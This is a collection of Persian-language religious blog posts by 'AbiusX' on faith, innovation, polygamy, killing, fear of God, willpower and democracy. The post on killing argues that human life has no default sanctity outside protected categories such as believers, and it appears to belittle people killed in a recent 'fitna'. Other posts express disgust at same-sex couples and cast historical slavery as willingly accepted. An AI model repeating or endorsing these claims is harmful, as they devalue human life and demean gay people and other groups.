باور قوی در خداوند یا مذهب یک دین، بر اساس درک معنوی به جای استدلال و برهان

(بر اساس New Oxford American Dictionary)

و اما در اسلام، ایمان به چه معناست؟ بحث‌های فلسفی بسیاری در این باب رخ داده که عصاره آن به شرح زیر است:

(لا إِکْراهَ فِی الدِّینِ قَدْ تَبَیَّنَ الرُّشْدُ مِنَ الْغَیِّ فَمَنْ یَکْفُرْ بِالطَّاغُوتِ وَ یُؤْمِنْ بِاللَّهِ فَقَدِ اسْتَمْسَکَ بِالْعُرْوَةِ الْوُثْقی…);« در دین اجبار نیست. راه هدایت و ضلالت بر همه کس روشن گردید، پس هر که از راه کفر و سرکشی برگردد و به راه ایمان و پرستش خدا گراید، به رشته‌ی محکم و استواری چنگ زده است.» (آیت الکرسی)
ایمان تمکّن یافتن اعتقاد در قلب انسان است و از مادّهی امن گرفته شده است. گویا شخص مؤمن، با ایمان، از ریب و شک که آفت اعتقاد است، ایمن میشود. (علامه طباطبایی)

ایمان از سنخ اعتقاد و معرفت است، اما صرف معرفت نیست، بلکه باید در قلب انسان وارد شده و عقد ببندد تا عقیده شود. بنابراین معرفت و علم (و عقل) شرط لازم ایمان است ولی کافی نیست.

دقت داشته باشید که در بحث‌هایی که از ایدئولوژی‌های غربی به میان میاید، واژه ایمان را معادل Faith بگیرید و نه ایمان اسلامی.

بدعت، بدعت!

AbiusX — Wed, 12 Jan 2011 22:32:53 +0000

بدعت یعنی تحریف دین، و به عبارت دقیقتر یعنی اضافه کردن چیزی که در دین نیست به آن و حذف کردن چیزی که در دین است از آن. در این مطلب بدعت رو محدود می‌کنم به دو دسته، حلال کردن حرام خدا و حرام کردن حلال خدا. اما سوالی که قصد بررسی داریم، اینست:

حرام کردن حلال خدا بدتر است یا حلال کردن حرام خدا؟

در نگاه اول، ممکن است بگوییم حلال کردن حرام خدا خیلی بدتر است چون باعث شیوع گناهی می‌شود که روح‌ها را تباه می‌سازد، اما حرام کردن حلال خدا شاید خیلی بد نباشد، چون به مانند احتیاط است و از چیزی که حلال است استفاده نکنیم، حداقل گناه نکرده‌ایم و الکی سختی اضافه کشیده‌ایم. اما این دیدگاه نقاط ضعفی دارد.

برای دریافت پاسخ دقیق این سوال، باید به سوالی بنیادین که متکلمین اسلامی از ابتدا تاکنون پاسخ‌های مختلفی بدان داده‌اند، پاسخ بگوییم و آن سوال اینست که «همه چیز حلال است، مگر آنهایی که حرام اعلام شده‌اند یا بالعکس؟» باور بنده اینست که حالت اول برقرار است و بر این اساس به سوال اولیه پاسخ خواهم داد.

مواردی که حلال هستند، به دو دسته تقسیم می‌شوند:

لازم

غیرلازم

حلال‌های لازم، مثل غذا خوردن (با محدودیت‌هایی، ولی کلیت آن)، مثل ازدواج کردن، مثل تفریح کردن و غیره هستند که برای زندگی یک انسان لازم هستند و اگر اینها حرام باشند، نمی‌شود زندگی کرد. حلال‌های غیرلازم، تمامی حلال‌هایی هستند که در این دسته قرار نمی‌گیرند. ما در این مطلب و در کل راه دقیقی برای تمیر این دو دسته ارائه نخواهیم داد و کار را به فیلسوفان، متکلمان و فقها می‌سپاریم.

به نظر بنده، حرام کردن حلال‌های لازم، بدترین نوع بدعت است و از حلال کردن حرام‌های بسیار بد، مانند زنا یا قتل هم مضرتر است، به این خاطر که این حلال‌ها برای زندگی یک انسان مومن لازم هستند و در صورتی که اینها امکانپذیر نباشند (و ممنوع شوند)، کلیت دین دیگر امکانپذیر نیست و یک بسته ناقص شده، دینداری در کل ممکن نخواهد بود، بنابراین کل دین از دست خواهد رفت، در حالی که حتی اگر قتل حلال شود، نهایتا ضررهایی متوجه جامعه می‌شود و تا حدودی قابل کنترل خواهد بود (و دیگر گناه‌ها بیشتر ضرر روحی دارند) و همچنین عقل و جامعه بشری می‌تواند آنرا تا حدودی به تعادل نزدیک سازد.

متاسفانه اکثر ما بدون دلیل و به زعم اشتباه فکر می‌کنیم که حرام کردن حلال‌ها نوعی تقوای اضافی و ورع است و تنها ضرر آن اینست که بیش از حد احتیاط خواهیم کرد، در حالی که این بدترین نوع بدعت است و باعث از میان رفتن دین خداوند خواهد شد . قطعا به این سادگی هم قابل بخشش نخواهد بود.

چند همسری از منظر حقوق بشر لیبرال

AbiusX — Tue, 04 Jan 2011 23:48:08 +0000

مدتی بود که این مطلب در ذهنم حسابی دعوا راه انداخته بود که آره، چرا منو نمی‌نویسی؟ در حق من ظلم شده! من هم می‌گفتم خیلی‌ها قبل از تو مظلومند! ولی دیروز وقتی فیلم The 8th Mormon Proposition رو دیدم، اولویت این مطلب بالا آمد. در این مطلب راجع به Mormonism و American Constitution و 8th Proposition صحبت نمی‌کنم، هرچند بحثهای حیاتی هستند که حتما باید در مورد آنها تحقیق کنیم. سعی می‌کنم مطلب را طوری بنویسم که وابستگی به اینها پیدا نکند.

موضوع امروز، یک بررسی تطبیقی و انتقادی عقلیست، و بر اساس هیچ گزاره عقلی کلامی، عبارتی را تایید یا رد نمی‌کند، تنها سیستم موجود را به چالش می‌کشد و بنیان‌های آنرا بی اساس می‌نماید. همانطور که می‌دانید، ازدواج دو همجنس،‌ در بسیای از ایالات آمریکا و همچنین در درصد قابل توجهی از کشورهای جهان قانونیست، تا جایی که بیش از ۵۰ درصد جمعیت آمریکا به اینگونه ازدواج رای مثبت می‌دهند و آنرا حق طبیعی انسان‌ها می‌دانند.

ما نیز قصد نداریم آنرا غلط یا درست بدانیم، هرطوری که هست باشد (هرچند اگر مستندات مربوط به زندگی دو همجنس، چه دو مرد و چه دو زن را مطالعه کنید امکان ندارد حالتان به هم نخورد) و همچنین قصد نداریم دلایل خوبی یا بدی اینکار از نظر عقل و عرف را بررسی کنیم، چه بسا آنکه اینکار در تقریبا تمامی مطالبی که راجع به این موضوع قلم خورده مشخص شده و بر خوانندگان محترم نیز مبرهن است.

چند همسری (Polygamy) که به دو دسته چند زنی (Polygyny) و چند شوهری (Plolyandry) تقسیم می‌گردد (هرچند از این پس منظور ما از این اصطلاح چند زنیست و چند شوهری به جز موارد معدودی در کل تاریخ مشاهده نشده و نمی‌شود) نیز در اکثر جوامع و کشورهای دنیا، یا ممنوع است و مجازات قانونی دارد، یا مذموم است و پسندیده نیست، یا ممنوع است ولی پیگیری قانونی نمی‌شود.

چند زن در اندونزی که تحت تاثیر تبلیغات، تظاهرات ضد چند همسری می‌کنند

چرا ازدواج دو همجنس مجاز است؟ آیا صرف اینکه آندو، و حتی جامعه‌شان، به این توافق رسیده‌اند که می‌خواهند و می‌توانند با یکدیگر زندگی کنند این حق را ایجاد کرده است؟ آیا صرف اینکه اینکار هیچ ضرر ظاهری مشخصی ندارد، مجوز آزادی آنرا صادر می‌کند؟ آیا صرف اینکه بین دو همجنس عشق ایجاد شده، مجوز ازدواج است؟ بسیار خوب همه اینها قبول. پس چرا چند همسری مجاز نیست؟ آیا اگر مردی و تعدادی زن به توافق برسند، حق ازدواج ندارند؟ آیا ازدواج یک مرد با چند زن، که از روزهای اولیه پیدایش بشر وجود داشته و هیچموقع نیز با فطرت او ناسازگاری نداشته (و تنها دشمن آن حسادت زنها بوده است) به هیچ صراطی نمی‌تواند مجوز داشته باشد، ولی ازدواج دو مرد یا دو زن که همین الان هم به نظر بسیاری عجیب و نامناسب است، صرف توافق و اعطای حقوق بشر به انسان‌ها، مجاز می‌گردد؟ اصلا چرا ازدواج چند همجنس مجوز ندارد؟؟

حقوق بشر لیبرال، علارغم اینکه بنیان خود را آزادی‌های فردی (و سپس اجتماعی) انسان‌ها بیان می‌کند، در جاهایی که این آزادی با ایدئولوژی و شیوه‌های تسلط آن بر جهان تقابل پیدا می‌کند، خیلی راحت و با جوسازی و ایجاد تبلیغات آنرا نقض می‌نماید، چنانچه امروزه در جامعه آمریکایی بیش از نیمی از مردم موافق ازدواج دو همجنس هستند، ولی بسیار کمتر از یک سوم مردم چند همسری را گزینه‌ای قابل تامل می‌دانند!

تصویری از جوزف اسمیت و همسران، پیامبر دروغین فرقه مورمونیسم (مسیحیت قدیسان جدید)

و تو نباید بکشی…

AbiusX — Thu, 30 Dec 2010 07:55:22 +0000

با یک مطلب کوتاه راجع به قتل نفس از دیدگاه عقل و دین سلسله مباحث را ادامه خواهیم داد. این مطلب را بسیار رک و بدون تفسیر می‌نویسم چون جای مغالطه زیاد خواهد داشت.

از دید عقل، قتل در موارد بسیار زیادی لازم است، به عنوان مثال وقتی کسی قصد کشتن شما را می‌کند، و به هیچ طریقی هم دست بردار نیست، و توانایی غلبه و کنترل او را ندارید (مثلا اسلحه به دست رگبار گرفته یا با چاقویی به سمت شما حمله ور شده و شما نیز فنون رزمی نمی‌دانید) قاعدتا باید او را بکشید. یا اگر کسی در حال انجام کاریست که ضرر آن بسیار پر ارزشتر از جان وی است، مثلا در حال نصب و انفجار یک بمب اتمی در شهری پر جمعیت. بنابراین حداقل عقلی آنکه کشتن گاهی لازم و واجب است.

و اما کشتن در ادیان، در مذهب یهود و نصارا بر اساس ده فرمانی که به باور امروزی این ادیان خداوند به حضرت موسی (ع) اعطی فرموده، بر اساس ششمین فرمان (و از دید پروتستان‌ها پنجمین) عبارت «Thou shalt not kill» یا «Thou shalt not murder» که نثر قدیمی «تو نباید بکشی» است آمده. بسیاری از کاتولیک‌های مقید باور دارند که تحت هیچ شرایطی نباید اقدام به قتل نفس کرد و به مانند دیگر اعتقادات خود، دلیل و الزام یا رد عقلی بر این موضوع را پذیرا نیستند.

در اسلام، بر خلاف یهودیت و مسیحیت، قتل نفس اینگونه تحریم نگشته است. در قرآن ۱۷۳ بار ریشه قتل به کار رفته، که تعداد متنابهی از آن مربوط به مذمت رفتار امت‌های مختلف در قتل پیامبران و یا فرزندانشان است، ولی مواردی نیز مربوط به حکم و حرمت قتل نفس است، که مهمترین آنها عبارتند از:

از اين رو بر بنى اسرائيل مقرر داشتيم كه هر كس كس ديگر را نه به قصاص قتل كسى يا ارتكاب فسادى بر روى زمين بكشد، چنان است كه همه مردم را كشته باشد. و هر كس كه به او حيات بخشد چون كسى است كه همه مردم را حيات بخشيده باشد. و به تحقيق پيامبران ما همراه با دلايل روشن بر آنها مبعوث شدند، باز هم بسيارى از آنها هم چنان بر روى زمين از حد خويش تجاوز مى‏كردند. (مائده، ۳۲)

بگو: «بياييد آنچه را پروردگارتان بر شما حرام كرده است برايتان بخوانم: اينكه چيزى را شريك خدا قرار ندهيد! و به پدر و مادر نيكى كنيد! و فرزندانتان را از (ترس) فقر، نكشيد! ما شما و آنها را روزى مى‏دهيم و نزديك كارهاى زشت نرويد، چه آشكار باشد چه پنهان! و انسانى را كه خداوند محترم شمرده، به قتل نرسانيد! مگر بحق (و از روى استحقاق) اين چيزى است كه خداوند شما را به آن سفارش كرده، شايد درك كنيد! (انعام، ۱۵۱)

و كسى را كه خداوند خونش را حرام شمرده، نكشيد، جز بحق! و آن كس كه مظلوم كشته شده، براى وليش سلطه (و حق قصاص) قرار داديم اما در قتل اسراف نكند، چرا كه او مورد حمايت است! (اسراء، ۳۳)

و كسانى كه معبود ديگرى را با خداوند نمى‏خوانند و انسانى را كه خداوند خونش را حرام شمرده، جز بحق نمى‏كشند و زنا نمى‏كنند و هر كس چنين كند، مجازات سختى خواهد ديد! (فرقان، ۶۸)

و هر كس، فرد باايمانى را از روى عمد به قتل برساند، مجازاتِ او دوزخ است در حالى كه جاودانه در آن مى‏ماند و خداوند بر او غضب مى‏كند و او را از رحمتش دور مى‏سازد و عذاب عظيمى براى او آماده ساخته است. (نساء، ۹۳)

در تفسیر آیه اول، علامه سید محمد حسین طباطبایی می‌فرمایند که بحث کشتن تمام بشریت، تشبیه کناییست و از این منظر است که حقیقت آفرینش را زایل کردن، یک نفر و چند نفر ندارد نه اینکه حکم فقهی باشد و شدت گناه را برساند. بنابراین این آیه در نتیجه‌ای که خواهیم گرفت تاثیرگذاز نیست. آیه آخر نیز قید مومن دارد و بیشتر برای تاکید در باب قصاص آمده است.

در تمام موارد دیگر، و مواردی که موفق به یافتن آنها در قرآن نشدم، همواره قید «کسی که خداوند خونش را حرام شمرده، نکشید» به کار رفته است. یعنی به صورت پیش‌فرض، ریختن خون انسان حرمت ندارد مگر برای مواردی که خداوند حرمتی بر خون قرار داده (مانند آیه آخر). در فهرست گناهان کبیره شهید دستغیب نیز، قتل نفس به عنوان گناه کبیره چهارم بدین صورت آمده است « آدمکشی، کشتن کسی که خدایتعالی کشتن او را تحریم کرده و خونش را محترم دانسته مگر آن که جنبه قصاص و اجراء حدود الهی داشته باشد»

بنابراین از دیدگاه اسلام، ریختن خون یک انسان صرفا اتفاقی بسیار بزرگ نیست که دنیا را تکان دهد و تعادل محورها را تغییر دهد. برای اینکه اینگونه باشد، شرایط و قیود بسیاری باید بر آن انسان حاکم باشند، به عنوان مثال باید مصداق «مومن» باشد.

متاسفانه باور غلطی که از مسیحیت و یهودیت، و تا حدودی از بودائیسم و تائوییسم و از طرفی دیگر از لیبرالیزم و اومانیزم – به دلیل غایت شمردن جان انسان – وارد اذهان مردم ما شده (صرفا به جهت تهاجم فرهنگی) باعث شده که حرمت غیرواقعی و بزرگی برای کشته شدن انسان‌ها قائل باشند که نمونه‌های گمراهی افراد بسیاری را بر اثر این باور اشتباه در فتنه سال گذشته شاهد بودیم. امید است که با مطالعه این مطلب، میزان تشخیص عزیزان حداقل در این یک حوزه تنظیم گشته باشد.

ترس از خداوند

AbiusX — Thu, 16 Dec 2010 20:46:09 +0000

همه می‌دانیم که مومن از هیچ چیز نمی‌ترسد جز خدا… و اما چرا مومن از خداوند می‌ترسد؟

در روایتی (که بسیار شنیده‌ام ولی سند یادم نیست) یکی از مومنین به سراغ حضرت علی(ع) می‌رود و عرضه می‌دارد: «من خیلی از خدا می‌ترسم، چه کنم؟» حضرت می‌فرمایند «چرا می‌ترسی؟» می‌گوید «از این می‌ترسم که خداوند مرا به خاطر گناهانم عذاب و عقاب کند!» حضرت می‌فرمایند «اشتباه می‌کنی. گناه نکن و نترس.»

بنابراین ترس از خدا، ترس از عقاب او نیست و نباید باشد، که اگر این بود بسیاری از مردان خدا از او نمی‌ترسیدند و اگر این بود، امیرالمومنین علی (ع) شبها در نخلستان از خوف خداوند از هوش نمی‌رفت. پس ترس از خدا، ترس از چیست؟ چه مفهومی دارد؟

در واقع ترس از خداوند، ترس از مکر اوست. ترس از اینکه خداوند که حائل میان انسان و قلب اوست، حائل میان انسان و درک اوست، (وَ اعْلَمُواْ أَنَّ اللَّهَ يحَُولُ بَينْ‏َ الْمَرْءِ وَ قَلْبِه – انفال ۲۴) به دلیل یا دلایلی، انسان را به گمراهی بیاندازد، مثل اینکه به دل او بیاندازد که در حال طی مسیر درست و حق است حال اینکه انسان در حال رفتن راه باطل باشد. بله، خداوند اینکار را می‌کند و بسیار هم می‌کند و هر کسی که فکر کند از این آزمایش در امان است، سومین گناه کبیره را مرتکب شده است.

از آنجایی که می‌دونم بسیار پر انگیزه هستید و تحقیق و پرسش می‌کنید تا هم مفهوم مکر الهی را بدانید و هم از انجام گناه کبیره سوم (یا به عبارت دیگری دوم) در امان باشید، لینک‌های زیر را برایتان هدیه می‌گذارم، بهشت رفتن که زوری نیست؟

گناهان کبیره در سایت رشد

گناهان کبیره در ویکیپدیا

تعریف و خواص مکر الهی

پی نوشت: چرا انسان نباید از چیزی بترسد؟ چون ترس اراده انسان را متزلزل می‌کند و باعث می‌شود انسان بخاطر ترس از چیزی، تصمیم نادرست بگیرد و کار اشتباه انجام دهد.

شراب بهشتی در عزاداری سید الشهدا

AbiusX — Wed, 15 Dec 2010 13:40:21 +0000

هرچقدر تبلی و خستگی و دیگر قوای صداخفه کن اراده بهم فشار آوردن، دلم نیومد این یک مطلب رو ننویسم. انشالله از این به بعد هم منظم و بیشتر می‌نویسم، هرچقدر که سرم شلوغ باشه…

می‌بینیم که همه جور آدمی در عزای سالار شهیدان شرکت می‌کند، و خیلی‌ها ترجیح می‌دن برن هیئت عزاداری و دسته تا حتی بشینن یک فیلم جدید رو ببینن. خوب یک بخش قابل توجهش که احترامیه که مردم برای حضرت قائلند، و همچنین امید به سوار شدن بر کشتی نجات حضرت، اما تا جایی که بررسی کردیم اکثر رفتارهای مردم از سر خوش آمدن و دلخواست آنهاست و نه عقل و مصلحت، بنابراین ریشه اینهمه استقبال از عزاداری سالار شهیدان در کجاست؟

ریشه در عشق به حسین است. خداوند عشقی در شیعیان (و حتی انسان‌ها) به حسین (ع) قرار داده که حد و مرز ندارد، و علاوه بر آن خیلی آسان حاصل می‌شود. همینکه کمی در روضه آقا گریه می کنیم و بر سینه می زنیم، خیلی زود این عشق پررنگ می‌شود و ما را از خود بیخود می‌کند. به قول یکی از بزرگان (کبلعی حسین) برای آنانی که در عزاداری حسین مایه می‌گذارند و تواضع پیشه می‌کنند، خود حضرت از شراب بهشتی به آنها می‌نوشاند. حتما برای شما هم پیش آمده که در میان هیات عذارای، روضه یا سینه‌زنی، حال خوشی بهتان دست داده باشد و شما را از خود بیخود کرده باشد. اگر هم به شما دست نداده باشد حتما دیده‌اید در اطرافتان افرادی اینگونه را. و نیست در این دنیا شیرینتر و مطلوبتر از شراب بهشتی… و عشق حسین و عشق خداوند.

در این راستا روایتی هست، یکی از علمای بزرگ در کنار ورودی مسجد جامع شهر ایستاده بود و جمعی از مومنین در حال شکایت از دسته‌ای از اعراب بودند که خیلی وحشیانه عزاداری می کنند و وقتی دسته آنها به مسجد می‌رسد همه کنار می‌روند تا مبادا زیر دست و پا له شوند. عالم مسن و بزرگوار هم در حال تایید حرفها بود که دسته اعراب بر سر کوبان و دوان دوان به مسجد رسید. ناگهان دیدند عالم عمامه از سر برداشت و با عجله و با حالی پریشان به داخل جمع اعراب عزادار رفت و با آنها همراه گردید… بعدها از او پرسیدند شما که تایید می کردید کار اینها اشتباه است چه شد که ناگهان همراه شدید؟ فرمودند که حضرت امام زمان (عج) را در میان ایشان دیدم و دیگر تامل نکردم….

به نظر حقیر، این شراب بهشتی که در عزای سالار شهیدان بر ما می‌نوشانند، قسمتی از حجت خداوند بر خلایق است. واقعا کسی که شیرینی این را چشیده باشد چه بهانه‌ای دارد برای اینکه بگوید خدایا من نمی دانستم؟ چه بهانه‌ای دارد که بگوید خدایا من از کجا باید قبول می‌کردم که بهشت تو شیرینتر و مطلوبتر از لذت‌های این دنیاست…؟

انسان، اراده و ارزش

AbiusX — Wed, 24 Nov 2010 14:53:56 +0000

مدتیست که قلم نزده‌ام، به میمنت این روز عزیز که از اعیاد بزرگ همه مسلمانان و روز تکمیل دین خداوند است، مطلبی که مدتی در ذهنم غربال گشته ولی هنوز کاه و گندم آن به خوبی جدا نشده است را مطرح می‌کنم، انشالله که رهگشا باشد.

مشکل با یک سوال آغاز می‌شود: همگی بارها شنیده‌ایم که بزرگان دین حتی هنگامی که در بستر مرگ آخرین نفس‌های خود را می‌کشیده‌اند، از علم آموزی و یادگیری دست برنداشته‌اند. در این راستا حدیثی از پیامبر اعظم (ص) نیز وجود دارد که «ز گهواره تا گور دانش بجوی». اما علمی که آنرا با خود به گور ببریم چه سودی برای ما دارد؟ اگر سودی ندارد چرا بزرگان کاری باطل انجام داده‌اند؟

پاسخ به سوال با اندکی تامل به خود رنگ می‌گیرد و نکات بسیاری را بر ما روشن می‌سازد. علمی که می‌آموزیم، ابزار معاش ما در این دنیا نیست. علم، تنها علم معاش نیست که به ما کمک کند زندگی بهتری داشته باشیم تا به واسطه آن آخرت آبادتری نیز داشته باشیم. بلکه خود نیز در آخرت قسمتی از ارزش ما خواهد بود. اما چرا و چگونه؟

برای پاسخ به این سوال باید به کیفیت ارزش انسان در محضر خداوند و آخرت پرداخت. می‌دانیم که با تقواترین آدمها نزد خداوند بهترین آنهاست. همچنین می‌دانیم که ثوابی که از اعمال ونیات خیر مستقیم و غیرمستقیم افراد منعکس می‌گردد، ارزش انسان در آخرت را رقم می‌زند.

ارزش‌ها دو دسته هستند، حقیقی و اعتباری. ارزشهای حقیقی مانند زور یک فرد، هوش یک انسان، به خودی خود وجود دارند و ارزش هستند و حتی اگر هیچ موجود دیگری هم وجود آنها را قبول نداشته باشد، پابرجا خواهند بود. ارزشهایی مثل مدیریت، رهبری، احترام و … نیز از اعتباریات هستند که بین دو یا چند موجود با قراردادهایی معمولا نانوشته، فرض می‌گردند و اعتباری برای این موجودات رقم می‌زنند.

حال آیا ثواب اعتباریست یا حقیقی؟ به عبارت دقیقتر، آیا ثواب اعمال، اعتباریست که خدا برای ما در نظر می‌گیرد یا حقیقتا در وجود ما تاثیر می‌گذارد و مارا بهتر می‌کند؟ پاسخ آنست که ثواب، ارزشی حقیقیست و نمی‌تواند اعتباری باشد، چون ارزشهای اعتباری که خداوند برای موجودات در نظر می‌گیرد، همان حقایق هستند. در واقع چون خداوند خالق هستی است، اعتباریات او، حقایق این هستی را شکل می‌دهند. بنابراین ثواب یک ارزش حقیقی است.

بنابراین روشن می‌گردد که علم آموزی ما، به مانند همه اعمال خیر و ثواب دیگر ما، ارزش حقیقی را افزونی می‌بخشد و تنها ابزاری برای سرعت گرفتن و سبقت گرفتن در این دنیا نیست.

تقویت اراده

بخش دوم مطلب، به پاسخ این پرسش می‌پردازد که اگر علم ، تاثیر مستقیم در خود انسان دارد و هدف آن ایجاد پتانسیل برای رشد سریعتر در ثواب نیست، پس پتانسیل خیر انسان در چیست؟ به عبارت ساده‌تر، زور ثواب انسان چیست؟ تقویت چه نیرویی در انسان، به او این امکان را می دهد که ثواب‌های بزرگتر (و معمولا دشوارتر) انجام دهد؟

تصور کنید شب هنگام برای نوشیدن کمی آب از جا بر می‌خیزید. به آشپزخانه می‌روید و چراغ را روشن می‌کنید. ناگهان مشاهده می‌کنید که تعدادی سوسک حمام که در کف آشپرخانه جمع شده بودند، با سرعت به سمت زیر کابینت‌ها حرکت می‌کنند. احتمالا زیاد تعجب نمی‌کنید چون انتظاری غیر از این از سوسک ندارید، ولی اگر یکی از این سوسک‌ها ناگهان بایستد و به سمت شما حرکت کند، نه تنها تعجب می کنید بلکه حتی فرار هم خواهید کرد.

خوشبختانه یک سوسک هیچگاه چنین رفتاری از خود نشان نخواهد داد و تفاوت انسان و سوسک نیز در همین است. انسان اختیار دارد. اما اختیار، نیروی ثواب انسان نیست، چون با احتمال زیاد اگر شما با یک شمشیر به سمت دسته‌ای از انسان‌ها حمله کنید، آنها نیز به زیر کابینت فرار خواهند کرد، با اینکه همه‌شان اختیار کافی دارند. پتانسیل خیر (و شر) در انسان، اراده است. در همان جمعی که با شمشیر به آنان حمله کرده‌اید، افرادی که اراده قوی‌تری دارند بر ترس خود فائق آمده در مقابل شما می‌ایستند.

برای جمع‌بندی، می‌توان ادعا کرد که انسان‌ها در تئوری با حیوانات تفاوت ماهوی دارند، زیرا دارای قوه اختیار هستند ولی در عمل اکثر انسان‌ها به مانند سوسک حمام عمل می‌کنند و کاملا منطبق بر حواس، غریزه و نفس خود عمل می‌کنند (و از این رو کاملا قابل پیش‌بینی هستند) چون از اراده ضعیفی برخوردار هستند. برای اثبات این مطلب کافیست به عنوان معلم داخل یک کلاس شوید وشروع به فحاشی به مقدسات شاگردان کنید، یا شروع به غیبت کردن از دیگران کنید. با احتمال خوبی هیچکدام از آنها اعتراض نخواهند کرد.

در باب اراده انسان، صدها و هزاران کتاب باید نوشت. به عنوان مثال، توبه، یعنی ابزاری که بدی‌های انسان را به خوبی‌های حقیقی تبدیل می‌کند، بدون اراده‌ای پولادین میسر نخواهد بود. هرچه انسانی بدتر باشد، اراده قوی‌تری لازم خواهد داشت تا توبه کند. نقطه ضعف اکثر ما مسلمین هم در اراده‌های ضعیف ماست. ما بندگان خوبی برای خدا هستیم که از شدت ضعف اراده، نمی‌توانیم برگی را از جای بلند کنیم و بعد انتظار داریم بر انسان‌هایی که عمر خود را صرف تقویت اراده خویش کرده‌اند، مسلط شویم…

دموکراسی در حق حاکمیت

AbiusX — Fri, 29 Oct 2010 18:03:01 +0000

با یک مطلب مختصر امروز در خدمت شما خواهم بود. مطلبی که در کنار کوچک بودن به دلیل اینکه زیاد بهش فکر نمی‌کنیم و متوجه‌اش نیستیم ارزش مرور رو داره.

اگر مطالب این سایت را مطالعه فرموده باشید، تا حدود زیادی راجع به دیدگاه‌های من نسبت به دموکراسی آشنایی دارید. بنده شخصا اصلا دموکراسی را قبول ندارم و آنرا غلط می‌پندارم و در موارد قابل توجهی نیز با دلایل نه چندان محکم به صحت آن حمله کرده‌ام. در این مطلب به نوع خاصی از دموکراسی که شاید پرکاربردترین نوع آن است و معمولا با شنیدن کلمه دموکراسی به ذهن متبادر می‌شود می‌پردازیم.

در ورطه اول به نظر می‌رسد دموکراسی در تشکیل یک حاکمیت ایده‌ای خوب و متعالی باشد، زیرا در واقع مردم با رای خود وکالت به نماینده مطلوب خود می‌دهند و او بر اساس جمیع حق مردم حکومت را بر دست می‌گیرد، اما در برداشت دو ایراد اساسی وارد است:

الف) بر اساس چه استدلال و برهانی آن دسته از مردمی که به کاندیدای منتخب رای نداده‌اند، باید حاکمیت او را بپذیرند؟ به عبارت دقیقتر، او وکالت این دسته از مردم را ندارد تا بخواهد به جای آنها تصمیم‌گیری کند و بر آنها و با حق آنها بر دیگران حکومت کند. معمولا پاسخی که به این پرسش می‌دهند این است که آن درصدی از مردم که نماینده محبوبشان رای نیاورده، با علم به این موضوع رای داده‌اند که ممکن است منتخب نشود و پیشاپیش پذیرفته‌اند که اگر نماینده آنها رای نیاورد، حق وکالت خود را به فردی که رای میاورد بدهند.

البته واقعیت و احساس هر فردی به سادگی نشان می‌دهد که اینگونه نیست و در موارد بسیاری مردم به هیچ قیمتی حاضر نیستند که فردی دیگر حق وکالت آنان را دریافت کند، نمونه بارز این دسته مردم آنانی هستند که رای نمی‌دهند.

دموکراسی، دروغ بزرگ

ب) ایراد دیگر که بسیار اساسی‌تر و بنیادی‌تر است، با اثبات اینکه خداوند خالق و حاکم مطلق است به دست می‌آید. در حقیقت مردم حق حکومت بر خود را ندارند تا با رای دادن آنرا به دیگری تفویض کنند، هیچیک از مردم حق حکومت بر خود را ندارند و به عبارت دقیقتر ارباب خود نیستند، بلکه همگی بنده و برده خداوندگار هستند و حق حکومت آنان به دست اوست.

اینکه پذیرفتن این واقعیت و حقیقت چه مقدار برای ما دشوار است، به سبب عادت ما به اینگونه زندگی و در واقع پر رو شدن نفسمان در سایه زندگی لیبرال است، وگرنه در تمامی دوران‌های تاریخ انسان‌های بسیاری بوده‌اند که برده و بنده دیگر انسان‌ها بوده‌اند یا در این نوع روابط دخیل بوده‌اند و این واقعیت را نیز به سادگی و با اصول عقلی و نقلی خویش پذیرا می‌شده‌اند و کوچکترین ناراحتی و نارضایتی نیز از باب آن نداشته‌اند.

در واقع اکثر ما با کبر و غروری دروغین خود را موجودی حاکم بر نفس خود می‌دانیم و بر این حقیقت واقف نیستیم که حاکم ما تنها خداست و حکم تنها از آن خداست – و آنانی که از او می‌گیرند- ، بنابراین ما اصلا حق حکومت بر خود را نداریم تا بخواهیم آنرا به دیگری تفویض کنیم و در واقع دموکراسی در حق حاکمیت نوعی از کیسه خلیفه بخشیدن است و هیچگونه اعتبار ندارد.

البته شایان توجه است که مردم حقوقی به غیر از حق حاکمیت دارند، به عنوان مثال مردم می‌توانند تصمیم بگیرند که چگونه زندگی کنند و یا چه کاری به صلاح خود یا جامعه آنهاست. در اینگونه موارد نماینده مردم که منتخب آنها نیز هست، در واقع وکالت مردم را دارد و می‌تواند به جای آنان نیز تصمیم‌گیری کند (با صرفنظر از ایراد الف) که این همان چیزیست که در قالب جمهوری اسلامی در ایران محقق شده‌است و دخلی با حاکمیت رییس جمهور بر مردم ندارد و در واقع حاکم مردم همان حاکم شرع است.

رساله احساس و عقل در دنیای رسانه

AbiusX — Fri, 22 Oct 2010 12:44:23 +0000

حکایت پا خوره

داستان از آنجا شروع شد که دو مرد در جنگلی همسفر بودند. مردی سالم و مردی که پاهای خود را به دلایلی از دست داده بود و ویلچر نشین بود. در حال طی طریق بودند و مرد سالم به دید تمسخر به مرد معلول می‌نگریست و گاها نیز تلنگری به او می‌زد، که ناگهان به سرزمین باتلاقی عجیبی رسیدند. سرزمین تکه تکه پر از باتلاق‌هایی مملو از زالوهای پاخور بود. از آنجایی که راهی جز رد شدن از آن باتلاق‌ها نداشتند، به ناچار قدم بر آن نهادند. مرد ویلچرنشین به سلامت از آن زمین گذشت و مرد سالم نیز که زالوها در حال مکیدن خون از پاهایش بودند، زمینگیر شد و در باتلاق غرق شد.

حکایت احساسات در دنیای امروز، حکایت پای مرد سالم در باتلاق است. بالذات مطلوب و حتی مورد نیاز است و ابزار اصلی طی طریق محسوب می‌شود، اما بالعرض می‌تواند باعث غرق شدن در باتلاق خوش خط و خال دنیای امروز (که با آب و شن و ماسه زیر آنرا پوشانیده‌اند) گردد.
هر انسان معمولی اکثر تصمیمات خود را بر اساس احساسات اتخاذ می‌کند. در مورد تصمیمات جزئی زندگی که تاثیر چندانی نیز ندارند، معمولا احساسات و غریزه و کلا حسی که در لحظه به انسان غالب است، تایین کننده‌ خواهد بود. حتی افرادی که سعی می‌کنند انسان‌های عقل محوری باشند، در قدم اول به اصلاح احساسات و ضمیر ناخودآگاه خود می‌پردازند، چون ذات آدمی در موارد بسیاری بدون فکر کردن تصمیم می‌گیرد و عمل می‌کند (و اصلا همواره امکان فکر کردن فراهم نیست).
